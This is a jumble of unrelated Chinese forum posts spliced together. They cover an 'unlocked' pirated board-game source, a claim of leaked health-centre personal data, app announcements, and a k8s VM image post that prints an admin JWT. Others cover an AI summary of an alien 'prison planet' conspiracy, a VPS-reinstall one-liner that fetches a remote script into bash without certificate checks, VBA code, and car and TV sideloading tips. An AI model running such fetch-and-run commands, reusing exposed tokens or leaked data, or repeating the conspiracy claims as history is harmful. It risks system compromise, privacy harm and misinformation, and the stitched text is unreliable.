echo '--------------------------------------'
issue_or_renew
copy_certs
restart_services

七夕情侣飞行棋游戏限定解锁版源码，七夕情侣飞行棋限定版本源码已经发布！这是一款专为情侣打造的桌游，让您与您的另一半一起感受浪漫的体验。

更为重要的是，这个版本已经移除了路由器限制，解锁了全部功能，而且没有任何加密措施，您只需将源码上传至服务器即可畅玩。

密码都是：111111

偶然获得一份数据，源文件的＊全部都是完整的信息，中文全名，手机号，出生年月日齐全
怀疑是社区健康服务中心泄露出来的
唉，真是儿戏

介绍

Stargazers是一个 web 应用，它允许你添加任意数量的 GitHub 账户，并且对这些账户的 star 列表进行查询与分析。
一些应用截图：

主要功能

• 支持添加任意数量的 GitHub 账户
• 支持通过用户搜索、GitHub OAuth 或者一键按钮(通过 userscript 实现)等多种方式来添加账户
• 支持通过 star 时间，编程语言，仓库信息等多种方式进行查询
• 支持分析 star 列表
• 暗色模式支持

• 手机端支持

  用户脚本

  从 greasyfork 安装

在 GitHub 的用户资料页添加一个按钮，可以一键将该用户添加到 Stargazers.

其他

项目地址： https://stargazers.dev

本项目完全开源，更多细节可以去 GitHub 仓库查看： https://github.com/yuyinws/stargazers

欢迎大家使用并提出问题和建议~

废话少说,先上 wordpress 的下载链接:

https://github.com/heguangyu5/bpc-wordpress-6.2.2-zh_CN/releases

3 个可执行文件,分别可以在 Ubuntu 18.04 / 20. 04 / 22.04 上直接运行.

其中 wordpress-althttpd-ubuntu-22.04-amd64 补上两个缺失的类库也可以在 Debian 12 上运行.

详见 README.md

主要功能如: 文章,媒体,页面,评论,外观(主题切换),用户,设置(语言切换) 都可用.

关于 BPC

不了解 BPC 是什么的可以翻看之前的帖子.

简言之,BPC 可以将 PHP 代码最终转译成 C 语言,然后编译成动态链接库或者可执行程序,实现 PHP Native AOT.

简介：

搭建过k8s童鞋应该都懂搭建的痛苦，现分享k8s三主两从高可用架构虚拟机镜像，下载后直接导入vmware虚拟机即可，省去搭建烦恼，直接开始k8s学习之旅。

环境

系统：CentOS 7.9 内核版本：6.4
Kubernetes ：v1.28.0
etcd ： 3.5.9
helm：3.12.3

节点分布

192.168.1.51  - 192.168.1.53 为master节点，用nginx做高可用，etcd做共享存储
192.168.1.54  - 192.168.1.55 为node节点

查看po状态

[root@k8s-master01 ~]# kubectl get po -A
NAMESPACE     NAME                                       READY   STATUS    RESTARTS      AGE
default       tomcat6-64cdbd884f-shnnk                   1/1     Running   0             175m
kube-system   calico-kube-controllers-5bf57cc9c8-4mp4h   1/1     Running   6 (42m ago)   3h23m
kube-system   calico-node-4bvmp                          1/1     Running   0             3h23m
kube-system   calico-node-c55hh                          1/1     Running   0             3h23m
kube-system   calico-node-jqnvf                          1/1     Running   0             3h23m
kube-system   calico-node-sz6jb                          1/1     Running   0             3h23m
kube-system   calico-node-zx7gp                          1/1     Running   0             3h23m
kube-system   calico-typha-c6589cbc7-x2szw               1/1     Running   0             3h23m
kube-system   coredns-coredns-5959ff9594-kk4q8           1/1     Running   0             3h15m
kube-system   kubernetes-dashboard-65cd84fc57-wjh8l      1/1     Running   0             3h6m
kube-system   metrics-server-5fcd46896-wjbq2             1/1     Running   0             3h12m

查看k8s资源状态

[root@k8s-master01 ~]# kubectl  top node
NAME           CPU(cores)   CPU%   MEMORY(bytes)   MEMORY%   
k8s-master01   97m          4%     1075Mi          58%      
k8s-master02   80m          4%     922Mi           50%      
k8s-master03   72m          3%     818Mi           44%      
k8s-node01     38m          1%     447Mi           24%      
k8s-node02     51m          2%     582Mi           31%

测试ingress

[root@k8s-master01 ~]# kubectl get svc
NAME         TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)          AGE
kubernetes   ClusterIP   10.96.0.1      <none>        443/TCP          3h34m
tomcat6      NodePort    10.109.93.51   <none>        8080:32371/TCP   176m

[root@k8s-master01 ~]# curl -I 192.168.1.51:32371
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7454-1491118183000"
Last-Modified: Sun, 02 Apr 2017 07:29:43 GMT
Content-Type: text/html
Content-Length: 7454
Date: Mon, 28 Aug 2023 06:53:19 GMT

加本地hosts测试 192.168.1.9 www.aaa.com

访问dashboard
地址：https://192.168.1.51:31518/

获取登录token：

[root@k8s-master01 ~]# kubectl -n kube-system create token admin-user
eyJhbGciOiJSUzI1NiIsImtpZCI6IlhMbXJKcXlsYW05cVNONmZ6R08zY3djMlBGMmZzS3pSZ2hBOVo2TldPVUUifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjkzMjA5NDcxLCJpYXQiOjE2OTMyMDU4NzEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJhZG1pbi11c2VyIiwidWlkIjoiZDljNzk0MGMtZTUwZi00ODY1LTg0YmYtZmMwOTgwZWU5NmRhIn19LCJuYmYiOjE2OTMyMDU4NzEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDprdWJlLXN5c3RlbTphZG1pbi11c2VyIn0.LdFqlu0e18rPG_TgAq535us7fGNOOtu3luFapxaFWe8NwUMmZ1QeTCcaeRhhNPlhTvwwroVksA-jcI2zVkCUWnZUNuCnmf9Ro7N-VlryXNNBb98SGojlgDLdJQRmMoW-A-RNH5NUfwenDuuL3WGs1q8FjCSNil3ok3X3yQSX7M0WA-9zCGJSJBDFxWqfB5rMfsbuQo3nPKbWECXL-wAgAhgPXOIxQgrCfTtNkMJBAH0pmxVon6yv3QKpFYYvLIDyelxJ-F_zZ53k0-wwAiQ-uDZx243LPVPetrJjNM6AfVYFaeNWv-IaRw3S3F4T-B7R2o7sA1Agq6STq6T4KJQLEg

k8s虚拟机下载：https://www.aliyundrive.com/s/G27E2ZNYYwd
文件里面有.mp4后缀的删除.mp4即可，阿里云盘对文件的限制

若是用默认3.x版本内核会出现很多bug，k8s都建议升级到5.x版本以上，本镜像升级到最新稳定版本。
github上有很多人都测试了的，一下是其中之一
https://github.com/coreos/bugs/issues/254

用 AI 总结了下

第八章

1. 文件记录了马蒂尔达与外星人艾罗之间的对话。艾罗来自一个超古老的外星文明“同领地”。
2. 艾罗详细解释了她对地球和人类历史的非主流见解。其核心观点是地球被作为一个“监狱行星”利用了数百万年，用于囚禁其他星球的“现在-成为者”。
3. “现在-成为者”是一种高维的精神实体，拥有远超常人的意识和能力，不受时间空间约束，能够寄存并控制物质世界中的“替身”。
4. 一直存在一个名为“旧帝国”的外星势力，在火星等地建立基地，通过电击抹除记忆和催眠控制手段，利用这些被囚禁的“现在-成为者”。
5. “同领地”的远征军 10000 年前首次抵达地球，之后与“旧帝国”进行过多次战争，其中一次摧毁了火星基地，但主要的控制网还保留着。
6. “同领地”认为地球文明的多样性部分原因是其他星球也向地球遣送了大量罪犯、艺术家等难以控制的人。
7. 艾罗详细叙述了“同领地”与“旧帝国”之间的恩怨历史，地球被利用的始末经过，以及这些外星势力对人类历史的操纵。
8. “同领地”正在积极寻找并试图摧毁这些遗留下来的控制网，解放地球和被监禁的众多“现在-成为者”。
9. 文件记录了艾罗向马蒂尔达传授的大量关于宇宙、地球、人类文明历史的非主流见解。

第九章

1. 1150 年前，同领地(一个外星文明)发现地球上的科学和文化开始复苏，因为旧帝国(另一个外星文明)的遥控意识控制被削弱。一些天才如牛顿开始恢复科技记忆。
2. 地球是旧帝国的一个监狱行星，许多现在-成为者(有灵魂的存在)被驱逐到这里，并遭遇记忆删除。旧帝国在地球上建立了各种虚构的文明。
3. 同领地试图倾覆旧帝国在地球的统治，传授个人不朽的概念，但被旧帝国扭曲为唯一神的观念。
4. 摩西制定了十个催眠指令，犹太人开始信奉耶和华这一匿名的神。
5. 佛陀等思想家的哲学取代了旧帝国的邪神崇拜。
6. 同领地不直接接触地球，因为这里像个精神错乱的监狱，容易被捕获。地球也不稳定，不适合建立文明。
7. 地球上的现在-成为者间存在入侵和战争，各种陷阱被设计来捕获他们。旧帝国就是这样建立起来的。
8. 同领地无法直接解救地球上的现在-成为者，需要先摧毁旧帝国的控制系统。目前的政策是避免接触地球人。
   第十章
9. 地球历史可追溯到 20 多万年前，当时一个名为“旧帝国”的外星势力占领了银河系中大熊座一带的区域，并使用了核武器。
10. 旧帝国后将地球作为流放罪犯的监狱行星，在地球各地建立了洗脑设施，以消除流放者的记忆。
11. 亚特兰蒂斯和莱姆利亚的高度文明都是旧帝国流放者建立的，但都因灾难毁灭。
12. 公元前 10400 年，亚特兰蒂斯沉没，埋葬了他们的科技。公元前 11600 年出现冰河时期。
13. 文件详述了旧帝国在地球上建立的金字塔文明，如吉萨、提奥提华坎等，声称它们反映旧帝国的宇宙模式。
14. 文中提到一个外星势力“同领地”自公元前 6248 年起与旧帝国在地球进行长达 7500 年的战争。
15. 文中解释了苏美文明、古希腊神话、圣经故事等的来源，声称它们与外星力量的活动有关。
16. 文中涉及基督教会骑士团秘密控制金融的阴谋论，以及刺客组织的洗脑方式。
17. 文中最后称外星访谈者透露这些地球历史内幕，以说明人类都是外来者，地球是旧帝国的监狱。


第十一章

1. 采访对象名叫艾罗(Alero),说了很多专业的科学知识。她用许多科学家的例子比喻,如果这些天才们不会死亡,可以延续创造,文明会取得什么样的进步。
2. 艾罗提到宇宙中的一切都是由“现在-成为者”的思想创造的。人类近百年来的科技进步更快,是因为“旧帝国”的影响减弱了。
3. 艾罗认为,要解决地球问题,社会和人道主义问题更为重要,不应仅依靠科学家。目前地球科学忽视了“现在-成为者”的创造活力。
4. 艾罗详细批评现有科学的局限,认为应该研究精神和思想领域。“旧帝国”通过各种方式限制这方面的研究。
5. 艾罗表示,真正的文明是帮助“现在-成为者”恢复记忆和能力的文明。她希望帮助地球的科学和人道主义发展。
6. 艾罗透露她的飞船包含许多地球未知的技术,如果分发给科学家研究,将能取得进步。她详细列出了一些可研究的技术内容。
7. 艾罗作为飞行员和工程师,不能透露更多飞船细节,但相信地球工程师可以从中获取价值。她希望这些细节将对地球有益。

1 ，简体中文完整版：

https://ttzx0604.home.blog/2019/12/14/example-post/

2 ，繁体中文 完整版：

https://ttzx0604.home.blog/2022/04/20/1947%e7%be%85%e6%96%af%e7%b6%ad%e7%88%be%e5%a4%96%e6%98%9f%e4%ba%ba%e8%a8%aa%e8%ab%87%e9%8c%84-%e6%97%a5%e8%a8%98%e5%89%af%e6%9c%ac-%ef%bc%88%e6%ad%a3%e9%ab%94%e4%b8%ad%e6%96%87%ef%bc%8c%e5%8d%b3/

几个情况需要重装系统

1. 我的VPS装了一堆东西，很乱，想还原
2. 我的VPS之前东西和现在要装的东西冲突了。无法进行安装了
3. 我的VPS被人侵入当矿机了，机器满负荷运载
4. 想尝试bbr其他版本，ARM目前还是会失联
5. 更纯净更稳定最关键是甲骨文云你删机不一定能开出新机！所以重装系统很重要！

重装前的故事背景甲骨文云ARM或者AMD架构，Ubuntu系统几分钟内dd成debian或者ubuntu群友分享的，他经常用。我也成功重装了！

1.一键脚本

bash <(wget --no-check-certificate -qO- 'https://moeclub.org/attachment/LinuxShell/InstallNET.sh') -d 10 -v 64 -a -firmware -p 12345

系统参数-d 10 【7、8、9、10，11】Debian-u 20.04 【14.04、16.04、18.04、20.04】Ubuntu
密码参数，可以改成别的-p 12345

先来看下PHP初学者的学习线路：

• (1) 熟悉HTML/CSS/JS等网页基本元素，完成阶段可自行制作简单的网页，对元素属性相对熟悉。
• (2) 理解动态语言的概念和运做机制，熟悉基本的PHP语法。
• (3) 学习如何将PHP与HTML结合起来，完成简单的动态页面。
• (4) 接触学习MySQL，开始设计数据库。
• (5) 不断巩固PHP语法，熟悉大部分的PHP常用函数，理解面向对象编程，MySQL优化，以及一些模板和框架。
• (6) 最终完成一个功能齐全的动态站点。

1. 新手不要看到上面的概括就以为PHP学习是很简单的，编程是需要你认真的思考和不断的实践。下面具体解释一下PHP的学习线路。首先，任何网站都是由网页组成的，也就是说想完成一个网站，必须先学会做网页，掌握静态网页的制作技术是学习开发网站的先决条件。因此我们要学习HTML，为今后制作网站打下基础。学习HTML应该边学边做，HTML中的任何元素都要亲自实践，只有明白了什么元素会起到什么效果之后，才能深刻记忆，一味的看书是不行的。
2. 假设你已经可以完成一个静态页面了，那么就该开始了解动态语言，刚一接触动态语言，可能很多人都会有很多不解，代码不是作为直接输出的，而是要经过处理的，HTML是经过HTML解析器，而PHP也要通过PHP解析器，跟学习HTML一样的道理，想让任何的解析器工作，就必须使用它专用的语法结构。
3. 学习PHP，你应该感到幸运，因为如果你学过其他语言，你就会发现PHP还是相对简单的，这一阶段，你要搞清楚HTML和PHP的概念，你现在完全可以让PHP给你算算一加一等于几，然后在浏览器输出。不要觉得幼稚，这虽然是很小的一段代码，但是对于你的编程之路，可是迈出了一大步。不过现在，你还是一个菜鸟。
4. 接下来就要学习数据库了，MySQL可以说是PHP的黄金搭档，我们要征服这个数据库，在你理解了数据库的概念之后，就要尝试通过PHP来连接数据库，进而会用PHP成功的插入，删除和更新数据。
5. 这个时候，你可能会处于这种状态：你会HTML吗？会，我能编好几个表格排板的网页呢！你会PHP吗？会，我会把一加一的运算写在函数里，然后调用！你会MySQL吗？会，我可以把数据库里的数据插入删除啦！
6. 那接下来该做什么呢？尝试着做个小的留言本吧，这同样是新手面临的一道关卡。花了一段时间，你终于学会把表单的数据插入数据库，然后显示出来了，应该说一个程序的雏形已经诞生了。但是，你可能会看人家这个编论坛，那个开发CMS，我什么时候可以写一个呢？不要急，再巩固一下知识，熟悉了PHP和MySQL开发的要领后，再回头看你写的那个留言本，你也许会怀疑那真的是你写的吗？这个时候，你可以完善一下你写的留言本。留言本应该加入注册以及分页的功能，可以的话，UI也可以加强。
7. 这就算学会了吗？NO，NO，NO，还早呢，你到现在还没碰过OOP呢吧？那模板和框架呢？还要继续学习呀！PHP框架提供了一个用以构建web应用的基本框架，从而简化了用PHP编写web应用程序的流程。可以节省开发时间、有助于建立更稳定的应用。所以说，PHP框架是一个可以用来节省时间并强化自己代码的工具。当你第一次选择PHP框架时，建议多尝试几个，每个框架都有自己的长处和短处，例如Zend框架由于多样的功能、并且有一个广泛的支持系统，流行了很长时间。而CakePHP是一个晚于Zend的PHP框架，相应的支持系统也比较少，但是更为方便和易于使用。
8. 了解了面向对象和框架后，你应该接触一下XML了，总而言之，你绝对不会发现你全部都学会了，学无止境！学东西，永远不要妄想有速成这一说，技巧再多，但是缺少努力，那也是白搭。有一点可以保证，就是你学会了PHP，那么再学其它语言，肯定速成，反过来也一样，如果你之前学过其它的语言，那么学PHP肯定快。
9. 多借鉴别人成功的代码，绝对是有益无害，所以要多看那些经过千锤百炼凝出来的经典代码，是进步的最好方法。另外，要强调的是，学习一项技术过程中可能会遇到困难，可能会迷茫，你也许学了一半的PHP，又开始打C#的主意，或者有人说Java很好，这个时候你绝对不能动摇，要坚持到底，彻底学会。祝你顺利学成PHP，开发自己想要的网站。

出于工作需要，自己编写了一套Python程序来提取多个不同Excel文档中特定数据到指定新Excel文档中指定位置的一个小程序。
因使用到了openpyxl库，而该库只对xlsx发生作用，可实际收集到的文档是xlsx和xls的混合，当然了，告知发送人改为xlsx也不是不可以
但我还是倾向于用技术解决，幸搜寻到了一份批量将xls到xlsx的vba代码，将内置于一个新的Excel文档中，保存在文档文件夹下，运行该vba后
即可以批量将该文件夹下的多层文件夹内的xls文档另存为xlsx，避免了逐个打开后再另存为的机械动作，提高了工作效率。
作为工作日志，记录在这里，也方便有需要的朋友使用。

'***********访问当前文件夹下所有子文件夹及文件,
Dim iFile(1 To 100000) As String
Dim count As Integer

Sub xls2xlsx()
    iPath = ThisWorkbook.Path
    On Error Resume Next
    count = 0
    zdir iPath
    For i = 1 To count
        If iFile(i) Like "*.xls" And iFile(i) <> ThisWorkbook.FullName Then
            MyFile = iFile(i)
            FilePath = Replace(MyFile, ".xls", ".xlsx")
            If Dir(FilePath, 16) = Empty Then
                Set WBookOther = Workbooks.Open(MyFile)
                Application.ScreenUpdating = False
                ActiveWorkbook.SaveAs Filename:=FilePath, FileFormat:=xlOpenXMLWorkbook, CreateBackup:=False
                WBookOther.Close SaveChanges:=False      '解决不能close 文件问题
                Application.ScreenUpdating = True
            End If
        End If
    Next
End Sub

Sub zdir(p)       '访问当前文件夹下所有子文件夹及文件
  Set fs = CreateObject("scripting.filesystemobject")
  For Each f In fs.GetFolder(p).Files
    If f <> ThisWorkbook.FullName Then count = count + 1: iFile(count) = f
  Next
  For Each m In fs.GetFolder(p).SubFolders
      zdir m
  Next
End Sub

准备工具：U盘、 电脑等

①通过电脑把下载好的安装包复制到优盘

②将U盘插入车机USB接口

③打开拨号输入#201301#然后在左边下拉到底，点击自动化测试，然后点击原生主页，找到ES文件浏览器打开（也可以用语音打开）

④进入es文件浏览器以后，左边黑色。那一块往上拉，找到根目录。然后点击mnt/udisk（ U盘路径）然后找到刚才下载好的安装包文件

⑤长按并选择刚才下载好的安装包，然后点击屏幕下方的复制，然后再点屏幕右下角取消

⑥然后在ES文件浏览器左边黑色部分，找主页点击，屏幕下方会出现一个新键

⑦点击新建 ，会出现一个弹窗，将第1条改为本地，第2条输入/data/app输入完以后点击屏幕左下角窗口，然后在屏幕正上方点击剪贴板，粘贴，长按音量下键重启两次，等待安装包安装完成

⑧两次重启完成以后，打开拨号输入#201301#左边最底下找到自动化测试，进入原生主页，就可以看到已经安装好的软件，但是桌面不会显示图标

⑨可以通过安装第三方桌面或者侧边栏来启动安装好的第三方软件

⑩至此软件安装完成，如需卸载原车高德，原桌面显示第三方软件可通过ROOT车机后更改桌面程序WT_Launcher来实现！

1、打开设置，打开最下方的"系统"，打开"关于本机"。
2、找到"型号"，按遥控器“左-左-右-右”重复3次，此时会提示"已经进入开发人员模式。
3、退出，进入"通用"，这时就会发现里面多了一个"其他"，点击进入。
4、出现了"开发人员选项"，点击进入
5、打开开启HDC即可用adb连接

adb connect 【电视机ip地址】

com.huawei.doorbellcamera 可视化门铃
com.huawei.vmall.tv 华为商城
com.microsoft.rdc.android 云视听小电视
com.huawei.educenter.tv 教育中心
com.huawei.aifitness 运动健康
com.huawei.huaweivision.cloudlink （welink）会议
com.karaoketv.yst 云视听全民K歌
com.huawei.tvhelp 玩机技巧
com.huawei.android.pushagent 推送服务
com.ixigua.android.tv.wasu.huawei 华数鲜时光
com.huawei.appmarket.tv 应用市场
com.huawei.fastapptv 快应用
com.gala.video 奇异果tv
com.huawei.android.totemweather 天气
com.huawei.intelligenttv 智慧助手今天
com.huawei.himovie.tv 华为视频

ACG2vec全称为Anime Comics Games to vector 。本 repo 会持续维护一些基于二次元相关的深度学习领域实践与探索。

在线预览（目前包含文本搜索、以图搜图、文本搜图、图片分数预测）：https://cheerfun.dev/acg2vec/

开源仓库：https://github.com/OysterQAQ/ACG2vec

演示页前端开源仓库：https://github.com/wewewe131/acg2vec-frontend

以上两个仓库求个 star QAQ???

目前模块包括：

• model：深度神经网络模型模块，目前包括

  2. acgvoc2vec：基于从维基百科动漫列表、萌娘百科、Bangumi 、pixiv 、AnimeList 等来源获取清洗处理抽取的 510w 语句对微调的 sentence-transformers 模型，生成二次元相关文本的特征向量，用于各种下游任务（标签推荐，标签搜索，推荐系统等）
  3. 可以使用 Huggingface 在线体验:https://huggingface.co/OysterQAQ/ACGVoc2vec
  4. dclip：使用 danburoo2021 数据集对 clip （ ViT-L/14 ）模型进行微调。
  5. 可以使用 Huggingface 在线体验:https://huggingface.co/OysterQAQ/DanbooruCLIP
  6. pix2score：基于 resnet101 的多任务模型，用于预测动漫插图的收藏数、浏览数与琴瑟级别
  7. illust2vec：从DeepDanbooru模型去除预测头并对末尾层做均值池化的图片语义特征抽取模型
• webapp：对外提供 web 服务模块。目前包括开箱即用的二次元插画标签预测服务、以图搜图服务、插画特征抽取服务、文本特征抽取服务
• docker：基于容器化的部署模块，包括了部署所需要的配置文件与资源文件

语义文本搜索

语义图像搜索

插画综合评分预测

以图搜图